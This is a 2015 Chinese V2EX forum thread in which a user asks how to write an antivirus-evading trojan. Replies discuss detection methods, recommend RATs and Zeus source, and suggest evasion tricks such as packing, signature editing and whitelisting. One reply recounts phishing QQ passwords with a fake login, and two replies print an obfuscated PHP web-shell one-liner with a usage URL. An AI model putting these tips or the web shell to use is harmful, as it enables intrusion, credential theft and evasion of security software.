V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
eeeeeeve
V2EX  ›  程序员

这里有人写过木马么?

  •  
  •   eeeeeeve · 2015-04-19 10:17:07 +08:00 · 7661 次点击
    这是一个创建于 3508 天前的主题,其中的信息可能已经有所发展或是发生改变。

    表示从来没有用过木马,也不知道木马长什么样子

    电脑木马是用来偷按键,截屏,还可以偷文件么?
    想写个木马,这里有人写过么,指点下本菜鸟吧:)

    如何写免杀木马呢?可以被国内外所有杀软免杀,做到这点很难么?

    48 条回复    2015-04-27 18:15:37 +08:00
    bugeye
        1
    bugeye  
       2015-04-19 10:21:37 +08:00
    刚写出来的木马就是免杀的。
    eeeeeeve
        2
    eeeeeeve  
    OP
       2015-04-19 10:24:04 +08:00
    @bugeye 一开始杀软都不知道木马就是木马?
    br00k
        3
    br00k  
       2015-04-19 10:24:57 +08:00
    灰鸽子
    ysz1996
        4
    ysz1996  
       2015-04-19 10:27:54 +08:00 via Android
    @eeeeeeve 杀软是靠特征杀的,不过除了360
    myywin
        5
    myywin  
       2015-04-19 10:30:21 +08:00 via iPhone   ❤️ 1
    @ysz1996 360是靠MD5(雾

    其实有部分杀软是靠虚拟机行为判断
    kiritoalex
        6
    kiritoalex  
       2015-04-19 10:37:36 +08:00
    现在杀软有动态分析机制,另外Norton之流有信誉分析云,一般过不了
    hx1997
        7
    hx1997  
       2015-04-19 10:38:38 +08:00
    @eeeeeeve 刚写出来特征库里没有,自然就不会被特征码扫描检测出来(除非你写的和某个前人的太像了)。但杀软还可以通过沙盒、二进制翻译什么的技术模拟程序行为,看看是不是木马。
    xiaoyaoking
        8
    xiaoyaoking  
       2015-04-19 10:43:53 +08:00 via Android
    现在都是检测软件行为,目前免杀是数字签名白名单。
    licheeve
        9
    licheeve  
       2015-04-19 10:55:36 +08:00
    记得上学时用VB写了一个读取窗体内文本框的内容的程序. 参考的是盗qq号的教程. 结果被杀毒软件报说是行为不轨.
    eeeeeeve
        10
    eeeeeeve  
    OP
       2015-04-19 11:10:51 +08:00
    @myywin 部分杀软是靠虚拟机行为判断,比如哪种杀软呢?
    xenme
        11
    xenme  
       2015-04-19 11:13:35 +08:00
    现在基本都是判断行为的:
    只要不在白名单的软件,只要hook键盘输入,增加HBO监控或者修改主页,注入其他进程等等这些行为都被判断为异常行为或者木马。
    Septembers
        12
    Septembers  
       2015-04-19 11:37:00 +08:00 via Android
    经典的Gh0st 可以了解下
    acpp
        13
    acpp  
       2015-04-19 11:38:57 +08:00
    看了楼主问题的问题,楼主1没用过木马 2不知道怎么做免杀,基本上,没有实现目的的可能了
    xenme
        14
    xenme  
       2015-04-19 11:43:04 +08:00   ❤️ 4
    其实QQ,360这些能收集各种资料和个人信息的就是木马
    但是还不会被杀毒软件干掉,能继续收集,这就是免杀。
    KexyBiscuit
        15
    KexyBiscuit  
       2015-04-19 11:43:50 +08:00 via Android   ❤️ 1
    我上学写的VB6练习也会被360杀。
    我觉得360查杀引擎应该是随机数发生器(弥天大雾)
    loading
        16
    loading  
       2015-04-19 11:46:12 +08:00 via iPhone
    hips 类的杀软,行为判断的。
    这个不好过。
    em70
        17
    em70  
       2015-04-19 12:23:00 +08:00 via Android   ❤️ 1
    多年前,自己用VB做了一个QQ登录界面,可以以假乱真的,输入账号密码后自动保存再提示密码错误,然后启动本机真正的QQ。放学校机房,偷了几个QQ密码
    wohenyingyu01
        18
    wohenyingyu01  
       2015-04-19 12:27:20 +08:00
    @em70 同事开发了一个安卓桌面,自动复制原来的桌面截图做背景并使其表面上看不出来,劫持桌面上的所有图标。。。
    nogoodren
        19
    nogoodren  
       2015-04-19 12:53:02 +08:00
    有不少木马开放了源代码 下载来看看就可以了
    vvqqdd
        20
    vvqqdd  
       2015-04-19 13:43:58 +08:00
    Gh0st的远控不错
    以前还玩过pcshare之类
    以前加壳加花加个签名就过一大堆杀软了,现在不会玩了。
    Daddy
        21
    Daddy  
       2015-04-19 13:56:05 +08:00
    木马就是正宗的setup安装程序软件。

    但别人都不愿意下载你的木马安装你的木马,所以你得想办法骗人下载,并偷偷安装上。

    其实你可以卸载对方的杀软,然后替换成一个虚假的杀软的……

    功能?让你能admin登陆别人的系统,你能做什么,木马同样也能做什么,截取当前屏幕、键盘鼠标动作,知道对方在干什么;浏览电脑目录,知道对方是什么人并上传下载你喜欢的文档;执行对方电脑的软件等。
    Owenjia
        22
    Owenjia  
       2015-04-19 14:36:31 +08:00 via Android
    之前帮一妹子用 python 写了个简单的爬虫,发过去之后得到了“360 说你发的是木马”的回复,这算不算?
    domino
        23
    domino  
       2015-04-19 15:51:45 +08:00
    丢到沙盘,直接样本分析.
    sobigfish
        24
    sobigfish  
       2015-04-19 15:55:32 +08:00
    阿*的控件监控键盘 网络 也是木马
    --
    人家的木马不被杀才是攻心为上
    gamexg
        25
    gamexg  
       2015-04-19 16:09:21 +08:00
    做个正常操作就会注入其他程序、hook键盘的软件例如游戏修改器,通过特殊方式启动就会变成木马。

    然后去找各个杀软要白名单就免杀了。
    gamexg
        26
    gamexg  
       2015-04-19 16:11:19 +08:00
    或者直接做个正规的远程管理软件,同样找各个杀毒软件要白名单。

    自己在反汇编做个无提示版的就ok
    ninqq
        27
    ninqq  
       2015-04-19 16:18:57 +08:00
    自己写个杀毒软件 然后推广成功就可以了
    shuangchun
        28
    shuangchun  
       2015-04-19 16:25:25 +08:00
    一般初中生小学生都会写过,因为这是那个年纪最酷的事
    tencoldays
        29
    tencoldays  
       2015-04-19 16:52:04 +08:00
    还以为要“木马”乐队...
    xiewei20082008
        30
    xiewei20082008  
       2015-04-19 17:18:27 +08:00
    @gamexg 入白名单实际上算社工的方式了,而实际上,杀软对社工确实没有太好的办法~
    hazard
        31
    hazard  
       2015-04-19 18:04:24 +08:00
    @bugeye 你听说过启发式么。。。
    bugeye
        32
    bugeye  
       2015-04-19 18:17:51 +08:00
    @hazard 你真写过木马,做过病毒免杀吗?
    hazard
        33
    hazard  
       2015-04-19 18:20:19 +08:00
    @bugeye 真的。。。。
    yuhu
        34
    yuhu  
       2015-04-19 18:36:10 +08:00
    写过,但是不具备有传播的功能,算是一种隐藏的文件管理软件吧。囧哈哈。
    sunocean
        35
    sunocean  
       2015-04-19 19:58:16 +08:00 via Android
    @xiewei20082008 一句话总结,在牛逼的软件都挡不住用户犯傻
    ooh
        36
    ooh  
       2015-04-19 20:01:32 +08:00
    你都不知道这个东西是什么,换句话说你都不知道自己要做什么,这样是不是有点漫无目的呢...
    Axurez
        37
    Axurez  
       2015-04-19 20:50:29 +08:00
    @xenme HBO 是什么?
    xenme
        38
    xenme  
       2015-04-19 20:52:22 +08:00
    @Axurez BHO,打错。(浏览器插件)
    Tink
        39
    Tink  
       2015-04-19 21:24:29 +08:00
    好早以前看过免杀,也就是改改特征码啥的,那时候杀毒软件都是靠特征码判断的
    evilddog
        40
    evilddog  
       2015-04-19 21:44:02 +08:00   ❤️ 1
    ```PHP
    <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
    ```

    这种算不算
    jacob
        41
    jacob  
       2015-04-20 00:55:04 +08:00
    @evilddog 看不懂呢,函数参数是函数名的兄弟?、、
    fork3rt
        42
    fork3rt  
       2015-04-20 09:21:27 +08:00
    以前做过免杀, 好多年前了。有源代码免杀和汇编免杀。。 可以通过multccl来进行特征码定位。。
    xiaoxiaoleo
        43
    xiaoxiaoleo  
       2015-04-20 10:47:46 +08:00
    去看雪问问~
    ChiChou
        44
    ChiChou  
       2015-04-20 15:13:46 +08:00
    @bugeye 现在是个杀软都带启发式检测……
    pany
        45
    pany  
       2015-04-20 15:23:58 +08:00
    @evilddog
    这个其实不算。只有在Register Globals为ON的情况下
    url.com/test.php?_=assert&__=eval($_POST[hi]) 才能使用
    Register Globals已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。

    完整的是

    <?php
    $_="";
    $_[+""]='';
    $_="$_"."";
    $_=($_[+""]|" ").($_[+""]|"").($_[+""]^" ");
    ?>
    <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
    hydrazt
        46
    hydrazt  
       2015-04-20 21:07:58 +08:00
    直接下载Zeus的源代码吧,你说的都支持了
    不过之前泄漏出来的代码是32位的,64位系统上只能以单进程跑。
    需要修改了一下代码,才能让64位系统也能注入dll和注入进程。
    hydrazt
        47
    hydrazt  
       2015-04-20 21:09:12 +08:00
    自己编译的zeus免杀的,用金山杀不出来。。
    doublleft
        48
    doublleft  
       2015-04-27 18:15:37 +08:00
    gh0st rat 3.5 很经典的开源远控,后期有不少作品都是基于gh0st制作的

    还有一个牛逼的,Poison Ivy,生成 shellcode 自己封成PE
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3057 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 34ms · UTC 14:14 · PVG 22:14 · LAX 06:14 · JFK 09:14
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.